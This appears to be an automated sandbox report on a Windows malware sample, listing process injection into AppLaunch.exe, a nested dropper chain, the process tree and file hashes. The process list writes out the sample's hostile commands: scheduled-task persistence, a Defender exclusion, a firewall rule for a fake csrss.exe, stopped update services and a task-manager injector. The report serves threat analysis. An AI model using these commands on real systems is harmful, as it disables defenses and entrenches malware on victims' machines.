Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 2176 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\SysWOW64\WerFault.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 1204 wrote to memory of 2800 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\531F.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2800 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\531F.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2568 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 1204 wrote to memory of 1304 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\5707.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2336 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2756 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe

"C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 88

C:\Users\Admin\AppData\Local\Temp\531F.exe

C:\Users\Admin\AppData\Local\Temp\531F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Users\Admin\AppData\Local\Temp\590B.bat

"C:\Users\Admin\AppData\Local\Temp\590B.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\59E3.tmp\59F4.tmp\59F5.bat C:\Users\Admin\AppData\Local\Temp\590B.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:340 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\6126.exe

C:\Users\Admin\AppData\Local\Temp\6126.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\6397.exe

C:\Users\Admin\AppData\Local\Temp\6397.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 132

C:\Users\Admin\AppData\Local\Temp\67BD.exe

C:\Users\Admin\AppData\Local\Temp\67BD.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\A598.exe

C:\Users\Admin\AppData\Local\Temp\A598.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\D928.exe

C:\Users\Admin\AppData\Local\Temp\D928.exe

C:\Users\Admin\AppData\Local\Temp\DE09.exe

C:\Users\Admin\AppData\Local\Temp\DE09.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 508

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010214932.log C:\Windows\Logs\CBS\CbsPersist_20231010214932.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:472077 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\taskeng.exe

taskeng.exe {7ABD7202-F279-4015-BED1-5F2A1E245989} S-1-5-21-2180306848-1874213455-4093218721-1000:XEBBURHY\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Roaming\jjfrwhh

C:\Users\Admin\AppData\Roaming\jjfrwhh

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1210562845-75886904112012832361226764823-375466633-14815315333155947651141236489"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {1E20F389-AF1A-4816-8AF8-108F48F02599} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

Network

Files


MD5 187deaabce830f0513783a8cb09059fe
SHA1 c16494ab0b4ff66ecad4874e9c759c358b5c7623
SHA256 d37521201499985e9d27e5281f7484edf4204545dba0f7ef505eee7fdb6479b5
SHA512 7267aeb8204788b9cb0f7794ad7de4445e59e386207dafe8007cac5838923d9400d138ef82bfc7c53e79cd39cd1ae37f8ccbf6f2740161c8fdd4d2f733d40986

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 862800b6435e5b90f17f7fb052c5bb40
SHA1 8ec9ffe3dff2a34f68857783d541b6e6c5a323fc
SHA256 770a9586747af6d09ad3dea70de8cb33f56b625e00ef7ee1635fc0ee16fb573e
SHA512 c7ffbfeade025bb95f5af68296117cb14200e2b85e9d1b2629705bb470f9f864a879c302bb0dee569ac320526cb26a41e0f8c4d9209b900ed75695f6ff7ae71f

memory/1620-904-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ABGWT92S\favicon[2].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

C:\Users\Admin\AppData\Local\Temp\A598.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\5h7y85m\imagestore.dat

MD5 ade9ae553b514222e1948c157d20d37c
SHA1 20af34c400cb980ec36cece9a1ed918c451a0756
SHA256 62c9ea86b881ec38aa7c8c43c8a8dd715b83a40d0aaf95dea78e4b6227afb44f
SHA512 86d68bd99b7cc109f4b5d60e20aa8fabb9292604a31be0f7ccedc9f697d6a029707bb7597e70ca0f5b9ad6eebadc67f7252d81e5aa92857719b71cbfac61b5b3

memory/1160-917-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/1160-918-0x00000000010B0000-0x0000000001FDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

memory/2552-954-0x00000000002E0000-0x000000000033A000-memory.dmp

memory/2100-953-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2100-957-0x0000000000AC0000-0x0000000000FD6000-memory.dmp

memory/2552-956-0x0000000000400000-0x000000000046F000-memory.dmp

memory/2212-952-0x0000000003F70000-0x0000000004368000-memory.dmp

memory/2212-965-0x0000000004370000-0x0000000004C5B000-memory.dmp

memory/1160-964-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2212-963-0x0000000003F70000-0x0000000004368000-memory.dmp

memory/2212-966-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D928.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/1620-975-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

